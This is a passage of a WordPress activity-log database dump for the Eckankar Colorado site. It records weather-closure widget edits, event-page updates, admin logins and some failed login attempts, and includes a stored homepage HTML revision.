#db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238448,40526,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238447,40526,'sidebar_id','null'),(238445,40526,'widget_id_base','custom_html'),(238446,40526,'widget_name_translated','Custom HTML'),(238444,40525,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238442,40525,'_user_email','nada@zipnadanot.org'),(238443,40525,'_server_remote_addr','76.130.120.x'),(238441,40525,'_user_login','S8zhaBda'),(238439,40525,'_message_key','widget_edited'),(238440,40525,'_user_id','2'),(238438,40525,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238436,40525,'sidebar_id','null'),(238437,40525,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; \\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238435,40525,'widget_name_translated','Custom HTML'),(238434,40525,'widget_id_base','custom_html'),(238433,40524,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238430,40524,'_user_login','S8zhaBda'),(238431,40524,'_user_email','nada@zipnadanot.org'),(238432,40524,'_server_remote_addr','76.130.120.x'),(238429,40524,'_user_id','2'),(238428,40524,'_message_key','widget_edited'),(238427,40524,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; \\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238426,40524,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238424,40524,'widget_name_translated','Custom HTML'),(238425,40524,'sidebar_id','null'),(238423,40524,'widget_id_base','custom_html'),(238422,40523,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(238421,40523,'_server_remote_addr','76.130.120.x'),(238420,40523,'_message_key','user_logged_in'),(238419,40523,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(238418,40523,'_user_email','nada@zipnadanot.org'),(238417,40523,'_user_login','S8zhaBda'),(238416,40523,'_user_id','2'),(238415,40523,'user_login','S8zhaBda'),(238413,40523,'user_id','2'),(238414,40523,'user_email','nada@zipnadanot.org'),(238412,40522,'_server_remote_addr','205.185.126.x'),(238411,40522,'_message_key','user_unknown_login_failed'),(238410,40522,'server_http_user_agent','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),(238409,40522,'failed_username','admin'),(238408,40521,'_server_http_referer','https://eckankar-colorado.org/newsletter-subscription-public/'),(238407,40521,'_server_remote_addr','71.218.44.x'),(238406,40521,'_message_key','post_updated'),(238405,40521,'post_title',''),(238404,40521,'post_type','nf_sub'),(238403,40521,'post_id','269316'),(238401,40520,'_message_key','user_unknown_login_failed'),(238402,40520,'_server_remote_addr','205.185.126.x'),(238400,40520,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4'),(238399,40520,'failed_username','administrator'),(238398,40519,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/?utm_source=BenchmarkEmail&utm_campaign=Oct_2023_Chela_Newsletter&utm_medium=email'),(238397,40519,'_server_remote_addr','97.121.164.x'),(238394,40519,'post_type','nf_sub'),(238395,40519,'post_title',''),(238396,40519,'_message_key','post_updated'),(238393,40519,'post_id','269315'),(238392,40518,'_server_remote_addr','45.61.188.x'),(238391,40518,'_message_key','user_unknown_login_failed'),(238390,40518,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),(238389,40518,'failed_username','administrator'),(238388,40517,'_server_remote_addr','52.144.45.x'),(238387,40517,'_xmlrpc_request','true'),(238386,40517,'_message_key','user_unknown_login_failed'),(238385,40517,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(238384,40517,'failed_username','admin'),(238383,40516,'_server_remote_addr','20.163.15.x'),(238381,40516,'_message_key','user_unknown_login_failed'),(238382,40516,'_xmlrpc_request','true'),(238380,40516,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(238379,40516,'failed_username','admin'),(238377,40515,'_server_remote_addr','98.50.100.x'),(238378,40515,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(238375,40515,'post_title',''),(238376,40515,'_message_key','post_updated'),(238374,40515,'post_type','nf_sub'),(238373,40515,'post_id','269314'),(238370,40514,'_message_key','user_logged_out'),(238371,40514,'_server_remote_addr','76.130.120.x'),(238372,40514,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?post_type=page'),(238369,40514,'_user_email','nada@zipnadanot.org'),(238368,40514,'_user_login','S8zhaBda'),(238367,40514,'_user_id','2'),(238365,40513,'_server_remote_addr','76.130.120.x'),(238366,40513,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Feckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(238364,40513,'_message_key','user_logged_in'),(238363,40513,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(238362,40513,'_user_email','nada@zipnadanot.org'),(238359,40513,'user_login','S8zhaBda'),(238360,40513,'_user_id','2'),(238361,40513,'_user_login','S8zhaBda'),(238358,40513,'user_email','nada@zipnadanot.org'),(238357,40513,'user_id','2'),(238356,40512,'_server_http_referer','https://eckankar-colorado.org/wp-admin/profile.php'),(238353,40512,'_user_email','nada@zipnadanot.org'),(238354,40512,'_message_key','user_logged_out'),(238355,40512,'_server_remote_addr','76.130.120.x'),(238352,40512,'_user_login','S8zhaBda'),(238351,40512,'_user_id','2'),(238350,40511,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269147&action=edit'),(238349,40511,'_server_remote_addr','76.130.120.x'),(238346,40511,'_user_id','2'),(238347,40511,'_user_login','S8zhaBda'),(238348,40511,'_user_email','nada@zipnadanot.org'),(238345,40511,'_message_key','post_updated'),(238344,40511,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ce0000;\">--Due To Weather - This Event Is Canceled--</span></strong></p>\r\n<p class=\"\"><strong><span style=\"font-size: 20pt;\">Ready For Some Spiritual Conversation?</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Spiritual discussions are forums that dive deep into spiritual topics. You’ll be able to share your spiritual experiences, perspectives, or questions. If you prefer to listen and learn, that’s cool too!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">People of all faiths and backgrounds are welcome. There’s no need to register—just drop in.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Explore this spiritual topic with other participants in a lively discussion led by an ECK Spiritual Aide (ESA), a specially trained member of the ECK clergy.<br>\r\n</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Preceded by a HU Chant from 9:45 - 10:15 a.m.</span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">Fifth Sunday this month, rather than the usual fourth Sunday</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(238343,40511,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 18pt; color: #ce0000;\">--Due To Weather - This Event Is Canceled--</span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 20pt;\">Ready For Some Spiritual Conversation?</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Spiritual discussions are forums that dive deep into spiritual topics. You’ll be able to share your spiritual experiences, perspectives, or questions. If you prefer to listen and learn, that’s cool too!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">People of all faiths and backgrounds are welcome. There’s no need to register—just drop in.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Explore this spiritual topic with other participants in a lively discussion led by an ECK Spiritual Aide (ESA), a specially trained member of the ECK clergy.<br>\r\n</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Preceded by a HU Chant from 9:45 - 10:15 a.m.</span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">Fifth Sunday this month, rather than the usual fourth Sunday</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(238342,40511,'post_title','The Spiritual Law of Grace and Divine Love'),(238340,40511,'post_id','269147'),(238341,40511,'post_type','mec-events'),(238339,40510,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(238337,40510,'_message_key','user_logged_in'),(238338,40510,'_server_remote_addr','76.130.120.x'),(238336,40510,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(238335,40510,'_user_email','nada@zipnadanot.org'),(238334,40510,'_user_login','S8zhaBda'),(238333,40510,'_user_id','2'),(238332,40510,'user_login','S8zhaBda'),(238330,40510,'user_id','2'),(238331,40510,'user_email','nada@zipnadanot.org'),(238329,40509,'_server_remote_addr','23.97.205.x'),(238328,40509,'_message_key','user_unknown_login_failed'),(238327,40509,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(238326,40509,'failed_username','wadminw'),(238325,40508,'_server_remote_addr','173.231.231.x'),(238324,40508,'_wp_cron_running','true'),(238323,40508,'_message_key','purged_events'),(238322,40508,'num_rows','501'),(238321,40508,'days','60'),(236995,40278,'post_new_post_content','<?xml version=\"1.0\" standalone=\"no\"?>\r\n<svg xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"wave\" style=\"transform:rotate(0deg); transition: 0.3s; margin-top: -80px;\" viewBox=\"0 0 1440 100\" version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\"><defs><linearGradient id=\"sw-gradient-0\" x1=\"0\" x2=\"0\" y1=\"1\" y2=\"0\"><stop stop-color=\"rgba(255, 255, 255, 1)\" offset=\"0%\"/><stop stop-color=\"rgba(255, 255, 255, 1)\" offset=\"100%\"/></linearGradient></defs><path style=\"transform:translate(0, 0px); opacity:1\" fill=\"url(#sw-gradient-0)\" d=\"M0,10L60,18.3C120,27,240,43,360,41.7C480,40,600,20,720,10C840,0,960,0,1080,5C1200,10,1320,20,1440,23.3C1560,27,1680,23,1800,20C1920,17,2040,13,2160,15C2280,17,2400,23,2520,23.3C2640,23,2760,17,2880,11.7C3000,7,3120,3,3240,6.7C3360,10,3480,20,3600,28.3C3720,37,3840,43,3960,50C4080,57,4200,63,4320,56.7C4440,50,4560,30,4680,26.7C4800,23,4920,37,5040,41.7C5160,47,5280,43,5400,48.3C5520,53,5640,67,5760,75C5880,83,6000,87,6120,80C6240,73,6360,57,6480,41.7C6600,27,6720,13,6840,15C6960,17,7080,33,7200,33.3C7320,33,7440,17,7560,10C7680,3,7800,7,7920,10C8040,13,8160,17,8280,21.7C8400,27,8520,33,8580,36.7L8640,40L8640,100L8580,100C8520,100,8400,100,8280,100C8160,100,8040,100,7920,100C7800,100,7680,100,7560,100C7440,100,7320,100,7200,100C7080,100,6960,100,6840,100C6720,100,6600,100,6480,100C6360,100,6240,100,6120,100C6000,100,5880,100,5760,100C5640,100,5520,100,5400,100C5280,100,5160,100,5040,100C4920,100,4800,100,4680,100C4560,100,4440,100,4320,100C4200,100,4080,100,3960,100C3840,100,3720,100,3600,100C3480,100,3360,100,3240,100C3120,100,3000,100,2880,100C2760,100,2640,100,2520,100C2400,100,2280,100,2160,100C2040,100,1920,100,1800,100C1680,100,1560,100,1440,100C1320,100,1200,100,1080,100C960,100,840,100,720,100C600,100,480,100,360,100C240,100,120,100,60,100L0,100Z\"/></svg>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -274px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local 